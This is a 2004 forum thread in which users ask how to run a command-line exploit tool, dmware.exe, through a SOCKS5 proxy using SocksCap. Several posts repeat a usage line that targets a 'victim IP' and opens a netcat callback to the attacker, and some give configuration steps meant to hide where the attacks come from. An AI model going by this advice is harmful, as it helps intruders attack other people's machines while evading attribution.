Running Commandline Programs Through Proxy Need Feedback
#1
Posted 14 March 2004 - 11:08 PM
Ok I usually use sockscap to run my programs through a socks 5 proxie.
My question:
I want to run a commandline program (example:dmware.exe) through a socks 5 proxie. Now to run dmware.exe from C:\ , I would have to open an instance of cmd.exe and type in dmware.exe "victim IP" "my IP" "nc port".
How do I get this commandline exe program that works through cmd.exe to work through a proxie?
My question:
I want to run a commandline program (example:dmware.exe) through a socks 5 proxie. Now to run dmware.exe from C:\ , I would have to open an instance of cmd.exe and type in dmware.exe "victim IP" "my IP" "nc port".
How do I get this commandline exe program that works through cmd.exe to work through a proxie?
#2
Posted 15 March 2004 - 12:11 AM
First understand how a proxy works..
Second code something that utilizes that and allows you to pipe information
then voila u can do something like
cmdproxy proxy.com dware 127.0.0.1 80
and voila it uses a proxy while runing that program
Will code if there are enough requests else.. waste of my time
Second code something that utilizes that and allows you to pipe information
then voila u can do something like
cmdproxy proxy.com dware 127.0.0.1 80
and voila it uses a proxy while runing that program
Will code if there are enough requests else.. waste of my time
#3 Guest_fry_*
Posted 15 March 2004 - 04:17 AM
I think alot of programs that are out could use some proxy support.I can't think of too many people who don't want proxy support in thier favorite programs.I myself have been looking forever for a sqlexec type program that has built in proxy support,I had a friend coding one but he never could get all the bugs out of the piping. :P
#4
Posted 15 March 2004 - 08:01 AM
fry, on Mar 15 2004, 04:17 AM, said:
I think alot of programs that are out could use some proxy support.I can't think of too many people who don't want proxy support in thier favorite programs.I myself have been looking forever for a sqlexec type program that has built in proxy support,I had a friend coding one but he never could get all the bugs out of the piping. :P
Just use sockscap for SQLEXEC. That's how i always use it.
#5
Posted 15 March 2004 - 10:28 AM
#6
Posted 15 March 2004 - 10:32 AM
You can run any prog wether cmd line or not through socks 5 eg the favourite NC
go to file new add name
browse to exe
then add working path
porfile Name DM
command line C:\dmware.exe "victim IP" "my IP" "nc port".
working dir C:\
that will then route it through the socks cap.
SOCKS cap works fine for me for all cmd line progs
go to file new add name
browse to exe
then add working path
porfile Name DM
command line C:\dmware.exe "victim IP" "my IP" "nc port".
working dir C:\
that will then route it through the socks cap.
SOCKS cap works fine for me for all cmd line progs
#8
Posted 15 March 2004 - 02:31 PM
@ bah, I understand how to add a program to socks cap, but when using it with a command line program like dmware.exe which has to be opened with cmd.exe. If you point cmd.exe to your dmware.exe it is not running through sockscap.
You would have to somehow cmd.exe -----> sockscap ------> dmware.exe
I have tried setting up cmd.exe in sockscap and then using it to open dmware.exe but am not sure it is running through the proxy.
You would have to somehow cmd.exe -----> sockscap ------> dmware.exe
I have tried setting up cmd.exe in sockscap and then using it to open dmware.exe but am not sure it is running through the proxy.
#12
Posted 15 March 2004 - 09:39 PM
Most people do not even realize when they are using these autohackers and such, they are not protected at all. I definately would like to see someone code a program that allows the use of these command line programs through a socks.
Or if anyone knows how to point to a program that has been set up to run through socks cap, via cmd.exe.
cmd.exe -----> sockscap -------> dmware.exe
Doesnt have to be socks cap if something else will work.
I am still searching for an answer and will post anything I find that may do the job. Thanks for the feed back.
Or if anyone knows how to point to a program that has been set up to run through socks cap, via cmd.exe.
cmd.exe -----> sockscap -------> dmware.exe
Doesnt have to be socks cap if something else will work.
I am still searching for an answer and will post anything I find that may do the job. Thanks for the feed back.
#14
Posted 17 March 2004 - 09:36 AM
"See the help file in the section about creating shortcuts. The
syntax for command line is the same as what you'd put in a shortcut."
google result no. 2 for "sockscap command line" :)
What about pointing directly to dameware.exe with the reuired arguments, bypassing the command prompt?!
syntax for command line is the same as what you'd put in a shortcut."
google result no. 2 for "sockscap command line" :)
What about pointing directly to dameware.exe with the reuired arguments, bypassing the command prompt?!
#15
Posted 17 March 2004 - 02:38 PM
Quote
What about pointing directly to dameware.exe with the reuired arguments, bypassing the command prompt?!
If you do it this way (pointing directly to dameware.exe with the reuired arguments) then you have to enter each Ip as part of the command line and do it one at a time, ie set each one up in sockscap with the parameters then change it for the next IP. Very tedious.

Sign In
Register
Help
MultiQuote